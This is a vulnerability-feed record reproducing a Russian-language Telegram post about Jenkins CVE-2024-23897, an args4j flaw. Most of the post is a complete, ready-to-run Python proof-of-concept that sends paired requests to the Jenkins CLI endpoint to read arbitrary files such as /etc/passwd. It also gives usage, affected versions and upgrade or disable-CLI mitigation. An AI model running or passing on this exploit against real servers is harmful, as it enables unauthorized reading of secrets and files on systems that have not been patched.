{"uuid": "a6999d34-1950-42e6-b77c-7616520bca4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/poxek/3618", "content": "Jenkins RCE Arbitrary File Read CVE-2024-23897 \n\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Jenkins. \u041f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c RCE \u043d\u0430 \u0430\u0442\u0430\u043a\u0443\u0435\u043c\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0447\u0435\u0440\u0435\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u043c\u043e\u0434\u0443\u043b\u044c args4j. \u042d\u0442\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e, \u0438 \u0432 Jenkins 2.441 \u0438 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445, LTS 2.426.2 \u0438 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u043e\u043d\u0430 \u043d\u0435 \u043e\u0442\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f.\n\nPoC\nimport threading\nimport http.client\nimport time\nimport uuid\nimport urllib.parse\nimport sys\n\nif len(sys.argv) != 3:\n    print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')\n    exit()\n\ndata_bytes = b'\\x00\\x00\\x00\\x06\\x00\\x00\\x04help\\x00\\x00\\x00\\x0e\\x00\\x00\\x0c@' + sys.argv[2].encode() + b'\\x00\\x00\\x00\\x05\\x02\\x00\\x03GBK\\x00\\x00\\x00\\x07\\x01\\x00\\x05zh_CN\\x00\\x00\\x00\\x00\\x03'\ntarget = urllib.parse.urlparse(sys.argv[1])\nuuid_str = str(uuid.uuid4())\n\nprint(f'REQ: {data_bytes}\\n')\n\ndef req1():\n    conn = http.client.HTTPConnection(target.netloc)\n    conn.request(\"POST\", \"/cli?remoting=false\", headers={\n        \"Session\": uuid_str,\n        \"Side\": \"download\"\n    })\n    print(f'RESPONSE: {conn.getresponse().read()}')\n\ndef req2():\n    conn = http.client.HTTPConnection(target.netloc)\n    conn.request(\"POST\", \"/cli?remoting=false\", headers={\n        \"Session\": uuid_str,\n        \"Side\": \"upload\",\n        \"Content-type\": \"application/octet-stream\"\n    }, body=data_bytes)\n\nt1 = threading.Thread(target=req1)\nt2 = threading.Thread(target=req2)\n\nt1.start()\ntime.sleep(0.1)\nt2.start()\n\nt1.join()\nt2.join()\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435: \npython poc.py http://127.0.0.1:8888/ [/etc/passwd]\n\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435:\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e Jenkins 2.442, LTS 2.426.3\n\n\u041f\u0430\u0442\u0447:\n\u0415\u0441\u043b\u0438 \u0432\u044b \u043d\u0435 \u043c\u043e\u0436\u0435\u0442\u0435 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0438, \u0442\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u0435 \u0434\u043e\u0441\u0442\u0443\u043f \u043a CLI, \u044d\u0442\u043e \u0434\u043e\u043b\u0436\u043d\u043e \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.\n\n\ud83c\udf1a @poxek", "creation_timestamp": "2024-01-26T10:20:52.000000Z"}